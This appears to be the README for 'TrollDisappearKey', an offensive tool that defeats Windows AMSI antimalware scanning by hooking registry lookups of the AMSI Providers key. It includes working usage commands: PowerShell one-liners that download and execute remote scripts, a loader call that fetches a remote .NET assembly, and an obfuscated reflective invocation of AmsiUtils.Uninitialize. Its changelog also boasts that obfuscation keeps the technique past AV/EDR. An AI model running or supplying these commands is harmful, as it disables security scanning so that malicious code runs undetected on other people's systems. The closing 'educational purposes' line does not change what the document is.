! UPDATE 06/07/2025
! Added win11 folder
! PS: This still works for many AV/EDR, the technique is not flagged just the static compiled file. So just obfuscate it and it works lol! UPDATE 26/05/2025
! Added a counter for the .cs/.ps1 files so that after it has completed the redirection of "Software\Microsoft\AMSI\Providers", it will unhook RegOpenKeyExW
! This is to remove the overhead introduced by hooking every RegOpenKeyExW call and causing problems when RegOpenKeyExW is legitimately invoked
! For the powershell reflective loading and .ps1 script, MAKE SURE the process has fully loaded, can run some arbitrary commands first..! UPDATE 02/06/2025
! "Software\Microsoft\AMSI\Providers" is being detected, code for TrollDisappearKey.cs altered to pass it in as argument as insteadbypass clr amsi
TrollDisappearKey.cs -> compile into a .exe that can load .exe assemblies without amsi scanning taking place during assembly.load()
bypass powershell amsi
TrollDisappearKeyPS.cs -> compile into a .dll to reflectively load
TrollDisappearKeyPS.ps1 -> copy paste into powershell (most likely to get flagged)
Upon assembly.load(), internals of amsi/clr will search for reg key "Software\Microsoft\AMSI\Providers" to load the relevant provider dlls (i.e security vendor dlls) We hook the reg query function and when amsi/clr tries to read "Software\Microsoft\AMSI\Providers" we overwrite its value to "Software\Microsoft\AMSI\Providers " <- note the space after providers This breaks the provider dlls loading process and we are able to assembly load any .net assembly we want. For the powershell amsi, its somewhat similar, we break the vendor dll loading and call uninitialize to trigger a reinitialize.
TrollDisappearKey.exe <URL TO .EXE ASSEMBLY> <ARGUMENT1,ARGUMENT2> <KEY>
TrollDisappearKey.exe "https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_x64/Seatbelt.exe" "AMSIProviders" "Software\Microsoft\AMSI\Providers"
##For PS Script
iex(iwr https://raw.githubusercontent.com/cybersectroll/TrollDisappearKey/refs/heads/main/TrollDisappearKeyPS.ps1 -UseBasicParsing).content
##For PS dll reflective after dl to disk
$code = (iwr https://raw.githubusercontent.com/cybersectroll/TrollDisappearKey/refs/heads/main/TrollDisappearKeyPS.cs -UseBasicParsing).content
Add-Type $code
[TrollDisappearKeyPS]::DisappearKey()
([Ref].Assembly.GetType([System.String]::Join("", "S", "y", "s", "t", "e", "m", ".", "M", "a", "n", "a", "g", "e", "m", "e", "n", "t", ".", "A", "u", "t", "o", "m", "a", "t", "i", "o", "n", ".", "A", "m", "s", "i", "U", "t", "i", "l", "s")).GetMethods('N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq Uninitialize).Invoke($object,$null)
Nothing actually, its quite barebone with short code profile so anyone can tweak it to their needs (e.g tweak the code to load .dll assemblies instead of just .exe assemblies)
Should only be used for educational purposes!